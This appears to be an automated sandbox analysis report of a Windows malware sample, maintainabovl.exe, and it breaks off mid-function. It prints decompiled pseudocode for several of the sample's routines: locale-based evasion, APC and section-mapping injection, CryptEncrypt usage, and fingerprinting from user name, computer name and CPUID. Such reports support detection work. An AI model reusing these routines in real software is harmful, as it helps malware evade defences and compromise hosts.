Instruction Fuzzy Hash: 1D113A31B0422D8FCB18CF94C219AEEB7F3AB88714F158469C4097B651CB77AD44CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: maintainabovl.exePID: 5732, Parent PID: 5976COMMON

Executed Functions

Function 00401178 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00401178() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D96();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E00401F0B(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E004013E6(_t71);
						}
					} while (_v8 != 0);
					_t30 = E00401000(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E0040135E(_t67,  &_v16) != 0) {
						 *0x403178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E00401E51, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x403178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E00401F0B(_t75 + _t22);
					 *0x403178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E004013E6(_t66);
					goto L20;
				}
			}

0x0040117e
0x00401183
0x00401188
0x0040132f
0x0040132f
0x00401191
0x00401191
0x00401195
0x00401198
0x00401199
0x0040119f
0x004011a3
0x004011da
0x004011a5
0x004011ad
0x004011b3
0x004011b5
0x004011ba
0x004011c0
0x004011c2
0x004011c2
0x004011c9
0x004011cf
0x004011cf
0x004011d3
0x004011d3
0x004011e1
0x004011e8
0x004011f1
0x004011f4
0x004011fa
0x004011fd
0x00401206
0x0040132b
0x00000000
0x0040132d
0x00401219
0x0040121c
0x00401224
0x00401226
0x00401231
0x00401239
0x00401239
0x00401247
0x0040131d
0x0040131d
0x00401323
0x00401325
0x00401325
0x00000000
0x0040124d
0x00401258
0x00401296
0x0040129c
0x004012ae
0x004012b4
0x004012b8
0x00401314
0x0040131a
0x00000000
0x0040131a
0x004012c4
0x004012d2
0x004012da
0x004012de
0x004012e5
0x004012e8
0x004012ea
0x004012ea
0x004012f2
0x00000000
0x004012f4
0x004012f7
0x004012fd
0x00401302
0x00401309
0x00401309
0x00401310
0x00000000
0x00401310
0x004012f2
0x0040125a
0x0040125f
0x00401266
0x00401268
0x0040126c
0x0040128e
0x0040128e
0x00000000
0x0040128e
0x0040126e
0x00401273
0x00401278
0x0040127f
0x00000000
0x00000000
0x00401284
0x00401287
0x00000000
0x00401287

APIs

Part of subcall function 00401D96: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401183), ref: 00401DA5
Part of subcall function 00401D96: GetVersion.KERNEL32 ref: 00401DB4
Part of subcall function 00401D96: GetCurrentProcessId.KERNEL32 ref: 00401DD0
Part of subcall function 00401D96: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DE9

Part of subcall function 00401F0B: RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004011AD
Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 004011F4
GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 0040121C
GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401226
VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401239
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401266
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401284
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004012AE
QueueUserAPC.KERNELBASE(00401E51,00000000,?,?,00000000), ref: 004012C4
GetLastError.KERNEL32(?,00000000), ref: 004012D4
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004012DE
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004012E5
SetLastError.KERNEL32(00000000,?,00000000), ref: 004012EA
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004012F7
GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401309
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401310
GetLastError.KERNEL32(?,00000000), ref: 00401314
GetLastError.KERNEL32(?,00000000), ref: 00401325

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 3475612337-0
Opcode ID: fbdb15a310026681de5c045a80113a0e0a4c12016e4f715f74ae31f5e8c14a74
Instruction ID: c9965e1650b5d58896470e9fbb4011aa6c645074773e2c643f1b96b1ebd5facb
Opcode Fuzzy Hash: fbdb15a310026681de5c045a80113a0e0a4c12016e4f715f74ae31f5e8c14a74
Instruction Fuzzy Hash: 2051C871900215BBE711ABB59E489AF7B7CEB45754F104077FA01F72E0D7788A00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 010952F6 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E010952F6(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x109a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x109a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E01096A51(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x109a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x109a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E0109692B(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x010952ff
0x01095305
0x01095308
0x0109530e
0x0109530e
0x01095310
0x01095312
0x01095315
0x0109531b
0x0109531c
0x0109531d
0x01095323
0x01095328
0x0109532e
0x01095336
0x01095493
0x0109533c
0x0109533e
0x01095347
0x0109534c
0x0109535e
0x01095361
0x01095365
0x0109536c
0x01095370
0x01095378
0x0109547e
0x0109537e
0x0109537e
0x01095382
0x01095383
0x01095385
0x01095390
0x0109546a
0x01095396
0x01095396
0x01095399
0x0109539f
0x010953a5
0x010953a5
0x010953ad
0x010953af
0x010953b4
0x0109545b
0x010953ba
0x010953c0
0x010953c3
0x010953c6
0x010953c8
0x010953c9
0x010953ce
0x010953d0
0x010953d0
0x010953da
0x010953df
0x010953e2
0x010953e5
0x010953e7
0x010953f0
0x0109541a
0x010953f2
0x01095403
0x01095403
0x01095422
0x00000000
0x00000000
0x01095424
0x01095427
0x0109542a
0x0109542e
0x00000000
0x01095430
0x0109543f
0x01095445
0x0109544d
0x0109544d
0x00000000
0x0109542e
0x01095432
0x01095438
0x0109543d
0x01095454
0x00000000
0x00000000
0x00000000
0x0109543d
0x010953b4
0x0109546d
0x01095470
0x01095470
0x01095485
0x01095485
0x0109549d

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01095DD6,00000001,0109384E,00000000), ref: 0109532E
memcpy.NTDLL(01095DD6,0109384E,00000010,?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740), ref: 01095347
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01095370
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01095388
memcpy.NTDLL(00000000,775EC740,01B09600,00000010), ref: 010953DA
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,01B09600,00000020,?,?,00000010), ref: 01095403
GetLastError.KERNEL32(?,?,00000010), ref: 01095432
GetLastError.KERNEL32 ref: 01095464
CryptDestroyKey.ADVAPI32(00000000), ref: 01095470
GetLastError.KERNEL32 ref: 01095478
CryptReleaseContext.ADVAPI32(?,00000000), ref: 01095485
GetLastError.KERNEL32(?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109548D

Strings

@MqtNqt, xrefs: 01095432, 01095464, 01095478, 0109548D

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MqtNqt
API String ID: 3401600162-2883916605
Opcode ID: a4aae5d0d280d06f7eac1a6a25a69096ef3b3998f4337caea50852fc70b49c48
Instruction ID: 29dbdfcb0b8411f965899e58d9c64376d3c1321fe7f4adab763647d3d0d94977
Opcode Fuzzy Hash: a4aae5d0d280d06f7eac1a6a25a69096ef3b3998f4337caea50852fc70b49c48
Instruction Fuzzy Hash: 9A517C71A00208FFDF51DFA9DC94AEE7BB8FB44344F00846AF995E6140D7758A14EB21

Uniqueness

Uniqueness Score: -1.00%

Function 01095710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E01095710(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x109a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E01095208( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x109a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x109a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E01095E1E(_v8 + _v8, _t64);
							}
							HeapFree( *0x109a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x109a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E01095E1E(_v8 + _v8, _t64);
						}
						HeapFree( *0x109a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x01095710
0x01095718
0x0109571c
0x0109571f
0x01095724
0x01095726
0x0109572b
0x0109572b
0x01095731
0x01095733
0x01095740
0x010957a1
0x01095742
0x01095747
0x0109574d
0x01095752
0x01095760
0x01095764
0x01095773
0x0109577a
0x01095781
0x01095781
0x0109578c
0x0109578c
0x01095764
0x01095752
0x010957a3
0x010957a9
0x010957b3
0x010957b5
0x010957ba
0x010957c9
0x010957cd
0x010957d8
0x010957df
0x010957e6
0x010957e6
0x010957f2
0x010957f2
0x010957cd
0x010957fd
0x010957ff
0x01095802
0x01095804
0x01095807
0x0109580a
0x01095814
0x01095818
0x0109581c

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 01095747
RtlAllocateHeap.NTDLL(00000000,?), ref: 0109575E
GetUserNameW.ADVAPI32(00000000,?), ref: 0109576B
HeapFree.KERNEL32(00000000,00000000), ref: 0109578C
GetComputerNameW.KERNEL32(00000000,00000000), ref: 010957B3
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010957C7
GetComputerNameW.KERNEL32(00000000,00000000), ref: 010957D4
HeapFree.KERNEL32(00000000,00000000), ref: 010957F2

Strings

Uqt, xrefs: 0109578C, 010957F2

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uqt
API String ID: 3239747167-2320327147
Opcode ID: 6ff0c5ca1c40882fac6b364fd26eaf51d1e58018efb7e1cf86eb5cda0e60eb11
Instruction ID: 8c029e7f37693115ed4f987bb3014048b7fb858ac8321a3e9aefa743e17d0a0b
Opcode Fuzzy Hash: 6ff0c5ca1c40882fac6b364fd26eaf51d1e58018efb7e1cf86eb5cda0e60eb11
Instruction Fuzzy Hash: 35315071A00205EFDB21DFAADC91A6EFBF9FF48300F10406AE595D3250D735DA01AB20

Uniqueness

Uniqueness Score: -1.00%

Function 010960CC Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E010960CC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E01096A51(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0109692B(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x010960d9
0x010960da
0x010960db
0x010960dc
0x010960dd
0x010960e1
0x010960e8
0x010960f7
0x010960fa
0x010960fd
0x01096104
0x01096107
0x0109610a
0x0109610d
0x01096110
0x0109611b
0x0109611d
0x01096126
0x0109612e
0x01096130
0x01096142
0x0109614c
0x01096150
0x0109615f
0x01096163
0x0109616c
0x01096174
0x01096174
0x01096176
0x01096176
0x0109617e
0x01096184
0x01096188
0x01096188
0x01096193

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01096113
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01096126
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01096142

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0109615F
memcpy.NTDLL(?,00000000,0000001C), ref: 0109616C
NtClose.NTDLL(?), ref: 0109617E
NtClose.NTDLL(00000000), ref: 01096188

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: e329978d478de16c82c26fa462feb2050ed1edde3c570ba936cbd5c1ee91e620
Instruction ID: 5754e3b320eb6215179f4893988b6afd53e66d1bb62aae18a8471bc099c0432b
Opcode Fuzzy Hash: e329978d478de16c82c26fa462feb2050ed1edde3c570ba936cbd5c1ee91e620
Instruction Fuzzy Hash: 782114B2900219BFDF119FA5CC85ADEBFBDFF48740F104026FA45A6150D7768A54EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401B6A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401B6A(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401E0F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401b73
0x00401b7a
0x00401b7b
0x00401b7c
0x00401b7d
0x00401b7e
0x00401b8f
0x00401b93
0x00401ba7
0x00401baa
0x00401bad
0x00401bb4
0x00401bb7
0x00401bbe
0x00401bc1
0x00401bc4
0x00401bc7
0x00401bcc
0x00401c07
0x00401bce
0x00401bd1
0x00401bd7
0x00401bdc
0x00401be0
0x00401bfe
0x00401be2
0x00401be9
0x00401bf7
0x00401bf7
0x00401be0
0x00401c0f

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401BC7

Part of subcall function 00401E0F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401BDC,00000002,00000000,?,?,00000000,?,?,00401BDC,00000002), ref: 00401E3C

memset.NTDLL ref: 00401BE9

Strings

@, xrefs: 00401BB7

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: dc51e99e985c587c6bdcc215b8e38f7c5ab096fbb2da54a34adaec0d697700eb
Instruction ID: 86795c6970af49b208d53480fd9cbf16b2ab40a5dba41f078df892c72b7e177b
Opcode Fuzzy Hash: dc51e99e985c587c6bdcc215b8e38f7c5ab096fbb2da54a34adaec0d697700eb
Instruction Fuzzy Hash: 32211AB6D00209AFDB11DFA9C8849EEFBB9FF48354F10443AE605F3250D735AA458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E0F Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401E0F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401e21
0x00401e27
0x00401e35
0x00401e3c
0x00401e41
0x00401e47
0x00000000
0x00401e48
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401BDC,00000002,00000000,?,?,00000000,?,?,00401BDC,00000002), ref: 00401E3C

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 99f167ae56d6ca61dd9da5d948817d9e93ba348959c2c5d182d9c992146f9afb
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: E8F037B590020CFFDB119FA5CC85C9FBBBDEB44354B104D3AF552E10A0D6309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 01093660 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E01093660(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x109a3e0; // 0x1b09be0
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x109a2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x109a018; // 0x99c08bf
					asm("bswap eax");
					_t34 =  *0x109a014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x109a010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x109a00c; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x109a348; // 0xa6d5a8
					_t3 = _t37 + 0x109b62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d189, _t36, _t35, _t34, _t33,  *0x109a02c,  *0x109a004, _t112);
					_t40 = E01092C6E();
					_t41 =  *0x109a348; // 0xa6d5a8
					_t4 = _t41 + 0x109b66b; // 0x74707526
